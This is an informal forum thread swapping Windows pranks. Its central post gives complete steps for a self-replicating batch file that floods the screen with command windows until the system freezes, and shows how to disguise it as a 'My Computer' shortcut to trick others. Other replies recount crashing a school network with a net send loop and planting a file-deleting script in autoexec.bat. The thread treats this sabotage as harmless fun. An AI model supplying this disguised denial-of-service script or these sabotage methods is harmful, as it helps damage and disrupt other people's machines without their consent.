Can somebody perhaps explain to me what slow.bat actually forces Windows to do?

It forces it to open and run the file "slow.bat" but it repeats itself. Opening tons of windows in the process and overloading windows who can only handle so many requests in a loop. All the bat scripts in this thread aims at doing that... A loop with no end.

Well it ends when Windows crashes.

LOL thanks, now I understand, so its does not harm Windows in any way then?

 Haha silly little thing I saw the other day on youtube, most of you "pro techies" already know how to do this anyway.

How to crash windows - only way out is to restart your PC:D

1. Go to Notepad
2. Type in the following underneath each other
start
slow.bat
start
slow.bat
3. Save it as slow.bat - make sure you save it as all files
4. Double click and you will see ALOT of CMD screens flashing on your desktop, the more you click, the more will flash:D... untill ultimately your screen goes totally blank.

How to trick your frends using this:
Pretty obvious!\:p
Create a shortcut
Make the destination folder the slow.bat file you created
Change and Rename the Icon to whatever you want eg. My Computer.
Haha my frend nearly got a heartattack.

Just thought I'd share it with you guys

I did this when I was in Grade 10, back in the day. But instead of running it just locally, I used netsend.... and sent it through to the school server. I crashed the whole network. Each message received by the server would be forwared to each and every computer connected to the server, which amounted to around 60 computers.
My loop sent a total of 2000 messages, which ended up being 120'000 messages sent through by the server. Oh, I didn't do it again either....

So what I'm saying, is that this is old. Really not new or anything.

And to literally make a folder invisible
Create a new folder
Make sure NumLock is on,
hold alt+0160
then go 2 change icon
choose invisible icons:)

Was taught to do this in Grade 8.... (around 6 or 7 years ago I think, too long ago to remember)

Back in the day (of windows using autoexec.bat) we wrote a simple script that randomly deleted a file in the Windows dir. Pasted that into the autoexec.bat, took a while for them to figure that one out.

Back in the day I used to edit command.com with a hex editor and change all the built in shell commands - shifting them one key to the right on the keyboard... then edit the bad command or filename message... that was fun...
